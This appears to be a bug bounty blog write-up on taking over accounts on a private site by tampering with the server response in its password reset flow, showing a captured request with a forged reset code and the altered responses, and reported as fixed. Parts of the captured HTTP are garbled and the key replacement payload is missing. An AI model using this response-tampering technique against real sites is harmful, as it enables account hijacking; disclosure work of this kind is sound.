Account Takeover Via Password Reset Functionality

Account Takeover Via Password Reset Functionality

Hi everyone , here is one of my write-up on account takeover via password reset functionality . As the site is private let assume as site.com

So basically the password reset functionality work flow is like below

  • User requested for password reset
  • Then one code(12 digit Alphanumeric ) sent to the registered Email id
  • User have to provide the correct code then application ask to set new password

So lets start

to reset password user need to visit site.com/forgetpassword

the below form will appear ,

So here let say we use victim email id and requested for password reset

after that the below screen will appear , here we need to enter the correct code to reset the password . so the code is 12 digit so no way to brute force.

so here used some random code like "hacker" and i saw there is no validation of code length

so here is the request of code validation
_POST /memberp/users/send_reser_instruction
Content-Lenght: 67
Content-Type: application/x-www-form-urlencoded
Host: site.com
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
X-Request-With: XMLHttpRequest
Referer: site.com/forgotpassword
Cookie: bla=bla; _method=POST&data%5Bforgotpassword%5D%5Bpassword+Reset+code%5D=hacker&data%5Bforgotpassword%5D%5Bprcemailid%5D=UkRNS2JSUlZWcEdjdmNnRE1JOWVhuXFVMWpEMWMOREZHWExaaHRGaWdyWT0==_

here is the response

_HTTP/1.1 200 OK
Date: sun,08 may 2017 10:58:07 GTM
Server: Apache
Connection: Close
Content-Type: text/html; charset=UTF-8

The Password reset code entered by you is either invalid or has expired.
_

so after that i have provided the correct code to analysis the back-end validation

so for a correct code in the response body just changed like this

HTTP/1.1 200 OK
Date: sun,08 may 2017 10:58:07 GTM
Server: Apache
Connection: Close
Content-Type: text/html; charset=UTF-8

Content-length: 210

so as you can see it just validating the prcemailid2 value which we can get from the 1st request

_method=POST&data%5Bforgotpassword%5D%5Bpassword+Reset+code%5D=hacker&data%5Bforgotpassword%5D%5Bprcemailid%5D=UkRNS2JSUlZWcEdjdmNnRE1JOWVhuXFVMWpEMWMOREZHWExaaHR

so just in the response body you need to replace with below code

so the final response will be like this**

HTTP/1.1 200 OK
Date: sun,08 may 2017 10:58:07 GTM
Server: Apache
Connection: Close
Content-Type: text/html; charset=UTF-8

Content-length: 210
__

boom now the below screen appears

Now provide the new password and confirm new password and submit the request , password changed successfully . Navigate to login panel and login with new password .

successfully own the account

Status :Fixed
Bounty Rewarded

Did you find this article valuable?

Support Dipak kumar Das by becoming a sponsor. Any amount is appreciated!